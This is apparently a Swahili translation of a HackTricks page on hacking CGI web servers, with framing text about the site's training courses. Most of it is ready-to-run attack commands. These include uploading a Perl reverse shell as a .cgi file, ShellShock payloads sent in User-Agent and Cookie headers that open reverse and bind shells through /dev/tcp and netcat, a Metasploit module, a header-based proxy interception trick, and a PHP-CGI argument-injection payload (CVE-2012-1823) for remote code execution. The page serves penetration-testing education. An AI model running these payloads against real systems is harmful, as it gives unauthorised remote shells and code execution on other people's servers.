tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Taarifa

CGI scripts ni scripts za perl, hivyo, ikiwa umepata udhibiti wa seva inayoweza kutekeleza .cgi scripts unaweza kupakia shell ya perl reverse (/usr/share/webshells/perl/perl-reverse-shell.pl), badilisha kiambishi kutoka .pl hadi .cgi, toa idhini za kutekeleza (chmod +x) na fikia shell ya reverse kutoka kwa kivinjari cha wavuti ili kuitekeleza. Ili kujaribu CGI vulns inashauriwa kutumia nikto -C all (na plugins zote)

ShellShock

ShellShock ni udhaifu unaoathiri Bash shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash wa kutekeleza amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa mabadiliko ya mazingira, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hii kwa kuambatanisha kodhi mbaya kwenye mabadiliko ya mazingira, ambayo inatekelezwa wanapopokea mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo.

Kutatua udhaifu huu ukurasa unaweza kutoa kosa.

Unaweza kupata udhaifu huu kwa kugundua kwamba inatumia toleo la zamani la Apache na cgi_mod (ikiwa na folda ya cgi) au kutumia nikto.

Jaribio

Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba hiyo mistari inarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu.

Nmap

bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl (reflected, blind and out-of-band)

bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Shellsocker

bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

Kutilia

bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

Proxy (MitM kwa Maombi ya Web server)

CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com"

Kama variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma kichwa chenye: "Proxy: <IP_attacker>:<PORT>" na ikiwa server itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na server.

Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Kimsingi ikiwa cgi inafanya kazi na php ni "ya zamani" (<5.3.12 / < 5.4.2) unaweza kutekeleza msimbo. Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la web server bila kutuma vigezo (hasa bila kutuma herufi "="). Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano /index.php?-s (zingatia -s) na msimbo wa chanzo wa programu utaonekana katika jibu.

Kisha, ili kupata RCE unaweza kutuma uchunguzi huu maalum: /?-d allow_url_include=1 -d auto_prepend_file=php://input na msimbo wa PHP utakaotekelezwa katika mwili wa ombi. Mfano:

bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

Maelezo zaidi kuhusu vuln na uwezekano wa exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Andiko Mfano.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks